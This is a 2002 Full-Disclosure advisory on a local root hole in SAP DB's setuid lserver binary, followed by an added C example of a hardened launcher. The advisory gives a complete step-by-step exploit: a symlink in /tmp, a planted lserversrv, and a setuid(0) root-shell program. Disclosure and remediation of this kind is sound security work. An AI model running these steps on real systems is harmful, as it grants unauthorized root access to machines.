[Full-Disclosure] SAP database local root via symlink

From: KF (dotslashat_private)
Date: Wed Dec 04 2002 - 06:57:30 PST

    Hey folks,
    During an evaluation of the SAP database for Linux I located a 
    security issue in one of their suid binaries. This issue is a symlink 
    attack against a binary that makes an execve call to a file in your 
    current directory. The details of this issue are outlined below. You 
    should be able to exploit this by hand; however, I included a simple exploit.
    
    The alert from SAP is located here:
    http://www.sapdb.org/sap_db_alert.htm
    
    This code and alert will be added to http://www.snosoft.com/research
    
    -KF
    
    ---------
    
    This local attack upon SAP is based on sapdb-server-linux-32bit-i386-7_3_0_29.tgz; it is currently unknown if this affects other SAP flavors.

    [elguapo@rh8 pgm]$ pwd
    /usr/sapdb/depend/pgm
    [elguapo@rh8 pgm]$ ls -al lserver
    -rwsrwxr-x    1 root     sapdb       15673 Oct 22 10:42 lserver

    Using ltrace we can see an attempt to run ./lserversrv via execve():

    [elguapo@rh8 pgm]$ ltrace ./lserver
    __libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c <unfinished ...>
    __register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5, 0x4212a2d0) = 0
    malloc(10) = 0x0804a200
    strcpy(0x0804a200, "./lserver") = 0x0804a200
    execv("./lserversrv", 0xbffff994 <unfinished ...>
    --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++

    The problem with this execve call is that when looking for "./lserversrv" the lserver does not check for any symlinks. The abuser can very easily make his own lserversrv. We are just going to make a directory in /tmp to use for scratch space:

    [elguapo@rh8 pgm]$ cd /tmp
    [elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root"
    [elguapo@rh8 tmp]$ cd "snosoft+sapdb=root"

    Next we make a symlink to the suid binary lserver:

    [elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver

    As we saw above, lserver tries to do the following:

    execv("./lserversrv", 0xbffff994 <unfinished ...>

    This is easy enough to take advantage of...

    [elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv

    As you can see, we have the euid of root at this point in time...

    [elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
    uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)

    Finishing up the task is trivial from there...

    [elguapo@rh8 snosoft+sapdb=root]$ cat > root.c
    #include <stdlib.h>
    #include <unistd.h>

    /* Planted in place of lserversrv: lserver execs it with euid 0,
       so make uid/gid 0 permanent and hand over a shell. */
    int main(void)
    {
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
    }
    [elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c
    [elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv
    [elguapo@rh8 snosoft+sapdb=root]$ ./lserver
    sh-2.05b# id
    uid=0(root) gid=0(root) groups=500(elguapo)

    Copyright SNOSoft Inc. 2002 -KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
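The C program below is an added example written for this page; it is not code from KF's post, from SNOSoft, or from SAP DB. It contrasts the pattern the ltrace output above reveals (a setuid launcher calling execv on the cwd-relative path "./lserversrv", which is the actual root cause; the symlink in /tmp only relocates the launcher into a directory the attacker controls) with a hardened launcher that resolves the helper against a fixed absolute install directory, opens it with O_NOFOLLOW, checks ownership and mode on the opened descriptor rather than on the path, and execs that same descriptor. The install directory and helper name are taken from the session above; the trust policy (root-owned regular file, not group/world writable), the fixed PATH environment, the privilege drop and the /proc/self/fd exec are this example's own choices and are not stated in the advisory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Install directory and helper name come from the advisory's session; the
   rest of this file is an added illustration, not SAP DB code. */
#define HELPER_DIR  "/usr/sapdb/depend/pgm"
#define HELPER_NAME "lserversrv"

/* Vulnerable pattern (what the ltrace output shows): the setuid launcher execs
   the helper by a path relative to the current working directory. Whoever
   controls cwd, e.g. by running the launcher through a symlink in /tmp,
   chooses which file runs with euid 0. Does not return on success. */
int launch_vulnerable(void)
{
    char *argv[] = { "./" HELPER_NAME, NULL };
    execv(argv[0], argv);
    return -1;                       /* only reached if the exec fails */
}

/* Build an absolute helper path under a fixed install directory. Rejects a
   relative directory, an empty name and a name containing '/'. 0 on success. */
int build_helper_path(char *out, size_t outlen, const char *dir, const char *name)
{
    if (dir == NULL || name == NULL || dir[0] != '/' || name[0] == '\0')
        return -1;
    if (strchr(name, '/') != NULL)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* Trust policy for the helper's inode: a regular file, owned by root, not
   writable by group or others. Returns 1 if trusted, 0 otherwise. */
int helper_stat_trusted(const struct stat *st)
{
    if (!S_ISREG(st->st_mode))
        return 0;
    if (st->st_uid != 0)
        return 0;
    if (st->st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* Permanently give up the setuid privilege: effective ids become the real ids.
   Group first, because once root is gone the group can no longer be changed
   freely. Returns 0 when both drops took effect. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* Hardened launcher: absolute path, O_NOFOLLOW open, trust check on the opened
   descriptor (so the inode that was checked is the inode that runs; no TOCTOU
   window on the path), then exec through /proc/self/fd/N, which is what glibc's
   fexecve() does on Linux. A minimal fixed environment replaces the caller's.
   Returns -1 on any failure; does not return on success. */
int launch_hardened(const char *dir, const char *name, char *const argv[])
{
    char path[PATH_MAX];
    char fdpath[64];
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    struct stat st;

    if (build_helper_path(path, sizeof path, dir, name) != 0)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !helper_stat_trusted(&st)) {
        close(fd);
        return -1;
    }
    snprintf(fdpath, sizeof fdpath, "/proc/self/fd/%d", fd);
    execve(fdpath, argv, envp);
    close(fd);
    return -1;
}

int main(void)
{
    char *argv[] = { HELPER_NAME, NULL };
    /* Only if the helper does not itself need root; otherwise skip this step. */
    if (drop_privileges() != 0)
        return 1;
    if (launch_hardened(HELPER_DIR, HELPER_NAME, argv) != 0) {
        perror("launch_hardened");
        return 1;
    }
    return 0;
}
```

Run as an ordinary user on a machine without the SAP tree, the program simply reports that the helper could not be opened; the checks are the point. Two caveats: the /proc/self/fd exec (like fexecve) works for ELF binaries but not for "#!" scripts, because the interpreter would try to reopen a descriptor that O_CLOEXEC has already closed, and the trust check only makes sense if the install directory itself is root-owned and not writable by others, since an attacker who can rename entries in that directory can swap the helper before the open.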


